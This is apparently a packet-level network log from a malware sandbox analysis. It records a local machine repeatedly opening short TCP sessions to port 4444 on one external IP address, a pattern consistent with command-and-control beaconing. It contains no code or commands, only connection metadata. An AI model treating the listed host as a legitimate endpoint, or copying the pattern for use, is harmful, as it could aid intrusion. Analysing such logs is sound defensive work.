Oct 16, 2024 10:07:47.199964046 CEST	4444	50746	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:47.201951981 CEST	50746	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:47.202615976 CEST	50748	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:47.207119942 CEST	4444	50746	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:47.207631111 CEST	4444	50748	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:47.207799911 CEST	50748	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:47.209301949 CEST	50748	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:47.214374065 CEST	4444	50748	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:47.949912071 CEST	4444	50748	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:47.950186968 CEST	50748	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:47.952317953 CEST	50748	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:47.953042030 CEST	50750	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:47.957159996 CEST	4444	50748	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:47.957946062 CEST	4444	50750	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:47.958077908 CEST	50750	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:47.959940910 CEST	50750	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:47.964839935 CEST	4444	50750	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:48.728504896 CEST	4444	50750	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:48.730159044 CEST	50750	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:48.731092930 CEST	50750	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:48.731853008 CEST	50752	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:48.735963106 CEST	4444	50750	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:48.736855984 CEST	4444	50752	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:48.736983061 CEST	50752	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:48.738842964 CEST	50752	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:48.743838072 CEST	4444	50752	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:49.490556955 CEST	4444	50752	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:49.492793083 CEST	50752	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:49.493705034 CEST	50754	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:49.497683048 CEST	4444	50752	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:49.498617887 CEST	4444	50754	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:49.498702049 CEST	50754	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:49.500489950 CEST	50754	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:49.505362034 CEST	4444	50754	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:50.260200024 CEST	4444	50754	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:50.262145042 CEST	50754	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:50.262865067 CEST	50754	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:50.263902903 CEST	50756	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:50.267729044 CEST	4444	50754	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:50.268852949 CEST	4444	50756	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:50.268974066 CEST	50756	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:50.271048069 CEST	50756	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:50.275924921 CEST	4444	50756	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:51.014590979 CEST	4444	50756	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:51.017671108 CEST	50756	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:51.019015074 CEST	50758	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:51.022617102 CEST	4444	50756	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:51.023921013 CEST	4444	50758	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:51.024009943 CEST	50758	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:51.026628971 CEST	50758	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:51.031516075 CEST	4444	50758	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:51.751327038 CEST	4444	50758	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:51.753875017 CEST	50758	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:51.754957914 CEST	50760	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:51.759066105 CEST	4444	50758	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:51.759964943 CEST	4444	50760	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:51.760040045 CEST	50760	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:51.762312889 CEST	50760	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:51.767190933 CEST	4444	50760	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:52.500407934 CEST	4444	50760	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:52.502108097 CEST	50760	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:52.503856897 CEST	50760	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:52.505191088 CEST	50762	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:52.509021044 CEST	4444	50760	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:52.510154963 CEST	4444	50762	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:52.510276079 CEST	50762	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:52.512795925 CEST	50762	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:52.517657995 CEST	4444	50762	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:53.288177013 CEST	4444	50762	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:53.290154934 CEST	50762	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:53.291357040 CEST	50762	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:53.292414904 CEST	50764	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:53.296241045 CEST	4444	50762	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:53.297336102 CEST	4444	50764	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:53.297506094 CEST	50764	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:53.299302101 CEST	50764	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:53.304281950 CEST	4444	50764	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:53.999166965 CEST	4444	50764	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:54.002103090 CEST	50764	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:54.003082991 CEST	50764	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:54.004106998 CEST	50766	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:54.008194923 CEST	4444	50764	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:54.009007931 CEST	4444	50766	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:54.009110928 CEST	50766	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:54.011619091 CEST	50766	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:54.016495943 CEST	4444	50766	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:54.680445910 CEST	4444	50766	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:54.682138920 CEST	50766	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:54.682847977 CEST	50766	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:54.683831930 CEST	50768	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:54.687711000 CEST	4444	50766	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:54.688777924 CEST	4444	50768	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:54.688848019 CEST	50768	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:54.690543890 CEST	50768	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:54.696600914 CEST	4444	50768	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:55.365283012 CEST	4444	50768	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:55.366127014 CEST	50768	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:55.367063999 CEST	50768	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:55.367757082 CEST	50770	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:55.371948004 CEST	4444	50768	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:55.372818947 CEST	4444	50770	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:55.372888088 CEST	50770	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:55.374011040 CEST	50770	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:55.378909111 CEST	4444	50770	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:56.071489096 CEST	4444	50770	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:56.073930025 CEST	50770	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:56.074985027 CEST	50772	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:56.078880072 CEST	4444	50770	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:56.080063105 CEST	4444	50772	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:56.080162048 CEST	50772	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:56.082792044 CEST	50772	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:56.087766886 CEST	4444	50772	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:56.764209032 CEST	4444	50772	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:56.766151905 CEST	50772	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:56.767543077 CEST	50772	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:56.768476009 CEST	50774	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:56.773885965 CEST	4444	50772	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:56.774945021 CEST	4444	50774	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:56.775068998 CEST	50774	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:56.776968956 CEST	50774	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:56.783648014 CEST	4444	50774	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:57.463835955 CEST	4444	50774	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:57.466028929 CEST	50774	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:57.467068911 CEST	50776	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:57.471417904 CEST	4444	50774	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:57.471985102 CEST	4444	50776	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:57.472054958 CEST	50776	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:57.473859072 CEST	50776	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:57.478696108 CEST	4444	50776	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:58.139826059 CEST	4444	50776	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:58.142119884 CEST	50776	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:58.142657995 CEST	50776	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:58.143753052 CEST	50778	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:58.147510052 CEST	4444	50776	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:58.148607969 CEST	4444	50778	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:58.148726940 CEST	50778	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:58.151484013 CEST	50778	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:58.156558990 CEST	4444	50778	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:58.839940071 CEST	4444	50778	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:58.841917038 CEST	50778	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:58.842917919 CEST	50780	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:58.846837044 CEST	4444	50778	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:58.847836018 CEST	4444	50780	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:58.847891092 CEST	50780	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:58.849625111 CEST	50780	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:58.854444981 CEST	4444	50780	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:59.545380116 CEST	4444	50780	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:59.546164989 CEST	50780	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:59.547754049 CEST	50780	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:59.548557997 CEST	50782	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:59.552609921 CEST	4444	50780	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:59.553426027 CEST	4444	50782	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:59.553522110 CEST	50782	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:59.555115938 CEST	50782	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:59.560024023 CEST	4444	50782	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:00.241523981 CEST	4444	50782	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:00.242130041 CEST	50782	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:00.244930029 CEST	50782	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:00.246068001 CEST	50784	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:00.249836922 CEST	4444	50782	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:00.250977993 CEST	4444	50784	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:00.251077890 CEST	50784	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:00.253649950 CEST	50784	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:00.258507967 CEST	4444	50784	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:00.938376904 CEST	4444	50784	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:00.942246914 CEST	50784	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:00.942934990 CEST	50784	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:00.944288969 CEST	50786	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:00.948787928 CEST	4444	50784	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:00.949965000 CEST	4444	50786	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:00.950086117 CEST	50786	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:00.953188896 CEST	50786	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:00.958048105 CEST	4444	50786	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:01.647842884 CEST	4444	50786	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:01.650126934 CEST	50786	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:01.650268078 CEST	50786	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:01.651246071 CEST	50788	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:01.655131102 CEST	4444	50786	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:01.656135082 CEST	4444	50788	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:01.656260014 CEST	50788	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:01.658016920 CEST	50788	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:01.662849903 CEST	4444	50788	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:02.330456018 CEST	4444	50788	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:02.332215071 CEST	50788	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:02.333156109 CEST	50790	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:02.337115049 CEST	4444	50788	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:02.338958025 CEST	4444	50790	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:02.339008093 CEST	50790	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:02.340878963 CEST	50790	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:02.345690966 CEST	4444	50790	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:03.052092075 CEST	4444	50790	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:03.054133892 CEST	50790	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:03.055495977 CEST	50790	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:03.056478024 CEST	50792	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:03.060444117 CEST	4444	50790	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:03.061484098 CEST	4444	50792	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:03.061650038 CEST	50792	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:03.063419104 CEST	50792	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:03.068295956 CEST	4444	50792	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:03.756839037 CEST	4444	50792	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:03.758230925 CEST	50792	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:03.759381056 CEST	50792	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:03.760369062 CEST	50794	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:03.765664101 CEST	4444	50792	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:03.767792940 CEST	4444	50794	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:03.767891884 CEST	50794	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:03.769454956 CEST	50794	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:03.775960922 CEST	4444	50794	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:04.438764095 CEST	4444	50794	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:04.441462040 CEST	50794	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:04.442257881 CEST	50796	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:04.447331905 CEST	4444	50794	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:04.447467089 CEST	4444	50796	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:04.447633982 CEST	50796	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:04.449141979 CEST	50796	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:04.454133987 CEST	4444	50796	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:05.147469997 CEST	4444	50796	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:05.150124073 CEST	50796	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:05.150811911 CEST	50796	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:05.151973009 CEST	50798	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:05.155657053 CEST	4444	50796	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:05.156959057 CEST	4444	50798	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:05.157376051 CEST	50798	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:05.159260035 CEST	50798	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:05.164326906 CEST	4444	50798	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:05.839781046 CEST	4444	50798	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:05.841912031 CEST	50798	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:05.842680931 CEST	50800	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:05.846875906 CEST	4444	50798	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:05.847553015 CEST	4444	50800	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:05.847692013 CEST	50800	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:05.848912001 CEST	50800	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:05.853908062 CEST	4444	50800	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:06.525330067 CEST	4444	50800	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:06.526137114 CEST	50800	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:06.528292894 CEST	50800	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:06.529006004 CEST	50802	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:06.533224106 CEST	4444	50800	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:06.534104109 CEST	4444	50802	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:06.534169912 CEST	50802	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:06.535716057 CEST	50802	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:06.540580988 CEST	4444	50802	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:07.223052025 CEST	4444	50802	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:07.225855112 CEST	50802	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:07.226869106 CEST	50804	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:07.230879068 CEST	4444	50802	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:07.231821060 CEST	4444	50804	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:07.231889009 CEST	50804	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:07.233738899 CEST	50804	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:07.238620996 CEST	4444	50804	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:07.932255030 CEST	4444	50804	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:07.934098959 CEST	50804	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:07.934130907 CEST	50804	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:07.934813976 CEST	50806	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:07.939069986 CEST	4444	50804	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:07.939827919 CEST	4444	50806	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:07.939924002 CEST	50806	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:07.940922022 CEST	50806	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:07.945808887 CEST	4444	50806	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:08.620918036 CEST	4444	50806	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:08.622262955 CEST	50806	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:08.623752117 CEST	50806	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:08.624758959 CEST	50808	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:08.628837109 CEST	4444	50806	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:08.630146980 CEST	4444	50808	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:08.630234957 CEST	50808	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:08.632354975 CEST	50808	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:08.637455940 CEST	4444	50808	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:09.322675943 CEST	4444	50808	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:09.324964046 CEST	50808	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:09.325896025 CEST	50810	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:09.330064058 CEST	4444	50808	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:09.331063986 CEST	4444	50810	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:09.331191063 CEST	50810	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:09.333643913 CEST	50810	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:09.338541031 CEST	4444	50810	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:10.027160883 CEST	4444	50810	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:10.029705048 CEST	50810	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:10.030668974 CEST	50812	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:10.035511971 CEST	4444	50810	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:10.035605907 CEST	4444	50812	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:10.035686970 CEST	50812	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:10.038439989 CEST	50812	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:10.043303013 CEST	4444	50812	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:10.736664057 CEST	4444	50812	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:10.738120079 CEST	50812	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:10.738120079 CEST	50812	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:10.738544941 CEST	50814	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:10.743309975 CEST	4444	50812	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:10.743464947 CEST	4444	50814	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:10.743563890 CEST	50814	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:10.745089054 CEST	50814	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:10.750103951 CEST	4444	50814	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:11.424571037 CEST	4444	50814	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:11.426167011 CEST	50814	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:11.427062988 CEST	50814	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:11.428141117 CEST	50816	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:11.432018995 CEST	4444	50814	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:11.433124065 CEST	4444	50816	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:11.433199883 CEST	50816	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:11.434279919 CEST	50816	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:11.439203024 CEST	4444	50816	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:12.102070093 CEST	4444	50816	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:12.104707956 CEST	50816	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:12.105812073 CEST	50818	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:12.112755060 CEST	4444	50816	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:12.112788916 CEST	4444	50818	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:12.112871885 CEST	50818	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:12.115922928 CEST	50818	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:12.120909929 CEST	4444	50818	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:12.775217056 CEST	4444	50818	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:12.778117895 CEST	50818	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:12.778383970 CEST	50818	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:12.779656887 CEST	50820	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:12.783238888 CEST	4444	50818	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:12.784668922 CEST	4444	50820	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:12.784744978 CEST	50820	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:12.787658930 CEST	50820	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:12.792613029 CEST	4444	50820	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:13.475895882 CEST	4444	50820	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:13.478152990 CEST	50820	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:13.479166985 CEST	50820	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:13.480370045 CEST	50822	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:13.485023975 CEST	4444	50820	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:13.486021042 CEST	4444	50822	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:13.486145020 CEST	50822	4444	192.168.2.13	27.30.77.93
